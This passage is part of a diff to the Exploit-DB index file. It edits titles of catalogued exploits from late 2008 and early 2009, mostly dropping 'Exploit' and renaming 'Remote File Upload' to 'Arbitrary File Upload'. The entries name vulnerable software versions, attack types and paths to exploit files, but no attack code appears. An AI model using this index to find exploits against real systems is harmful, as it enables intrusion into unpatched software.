Underground",php,webapps,0 -7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 +7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 @@ -6964,12 +6965,12 @@ id,file,description,date,author,platform,type,port 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 -7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 +7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 -7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Remote File Upload",2008-12-11,ahmadbady,php,webapps,0 +7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps,0 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 @@ -6978,7 +6979,7 @@ id,file,description,date,author,platform,type,port 7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 -7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Remote File Upload",2008-12-12,InjEctOr5,php,webapps,0 +7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0 @@ -6995,12 +6996,12 @@ id,file,description,date,author,platform,type,port 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 -7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow Exploit",2008-12-14,SkD,windows,remote,69 +7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 -7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 @@ -7018,9 +7019,9 @@ id,file,description,date,author,platform,type,port 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 -7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 +7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - ''Username'' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0 -7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (allinone)",2008-12-15,krafty,windows,remote,0 +7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (All-in-One)",2008-12-15,krafty,windows,remote,0 7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - 'print.php id' SQL Injection",2008-12-15,nétRoot,php,webapps,0 7480,platforms/php/webapps/7480.txt,"CadeNix - 'cid' SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 @@ -7035,14 +7036,14 @@ id,file,description,date,author,platform,type,port 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 -7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow Exploit",2008-12-16,shinnai,windows,local,0 +7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,windows,local,0 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0 7494,platforms/php/webapps/7494.txt,"Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0 7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection",2008-12-16,"Marian Ventuneac",hardware,remote,0 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0 -7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary Remote File Upload",2008-12-17,mNt,php,webapps,0 +7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps,0 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow",2008-12-17,"Guido Landi",windows,local,0 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 @@ -7054,7 +7055,7 @@ id,file,description,date,author,platform,type,port 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 -7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 +7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - 'messages.php' SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 @@ -7090,13 +7091,13 @@ id,file,description,date,author,platform,type,port 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 -7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 +7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0 -7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 +7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0 @@ -7124,7 +7125,7 @@ id,file,description,date,author,platform,type,port 7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 -7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local SEH Overwrite",2008-12-28,Cnaph,windows,local,0 +7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 - Remote Buffer Overflow (Windows Vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - '.wav' Remote Crash (PoC)",2008-12-28,"laurent gaffié ",windows,dos,0 @@ -7139,12 +7140,12 @@ id,file,description,date,author,platform,type,port 7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI - 'id' SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 -7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 +7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 -7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 +7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0 @@ -7156,10 +7157,10 @@ id,file,description,date,author,platform,type,port 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 -7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow Exploit",2008-12-29,callAX,windows,remote,0 -7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit",2008-12-29,"Jon Oberheide",linux,local,0 +7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow",2008-12-29,callAX,windows,remote,0 +7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 -7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 +7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 - (mega://) Remote eval() Injection",2008-12-30,Nine:Situations:Group,windows,remote,0 @@ -7172,10 +7173,10 @@ id,file,description,date,author,platform,type,port 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 -7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Change Admin Pass Cross-Site Request Forgery",2009-01-01,x0r,php,webapps,0 +7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Change Admin Password / Cross-Site Request Forgery",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 -7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 +7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 @@ -7183,8 +7184,8 @@ id,file,description,date,author,platform,type,port 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos,0 -7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 -7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 +7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 +7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP 5.2.8 gd library - imageRotate() Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (VMware-authd) Remote Denial of Service",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 @@ -7198,7 +7199,7 @@ id,file,description,date,author,platform,type,port 7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (3)",2009-01-04,Houssamix,windows,local,0 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0 -7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) SQL Injection",2009-01-04,DaiMon,php,webapps,0 +7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (4)",2009-01-04,Stack,windows,local,0 7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (5)",2009-01-04,suN8Hclf,windows,local,0 @@ -7220,7 +7221,7 @@ id,file,description,date,author,platform,type,port 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0 7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 -7681,platforms/linux/local/7681.txt,"Debian GNU/Linux XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0 +7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (FrontPage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 @@ -7233,13 +7234,13 @@ id,file,description,date,author,platform,type,port 7691,platforms/php/webapps/7691.php,"Joomla 1.5.8 - (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 -7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash Exploit",2009-01-07,Stack,windows,dos,0 +7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0 7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 -7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution Exploit (Administrator Required)",2009-01-08,StAkeR,php,webapps,0 +7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,linux,remote,445 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 @@ -7271,7 +7272,7 @@ id,file,description,date,author,platform,type,port 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax (comment_id) - SQL Injection",2009-01-11,FasTWORM,php,webapps,0 7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 -7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 +7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 @@ -7279,7 +7280,7 @@ id,file,description,date,author,platform,type,port 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 -7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 +7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 @@ -7288,21 +7289,21 @@ id,file,description,date,author,platform,type,port 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0 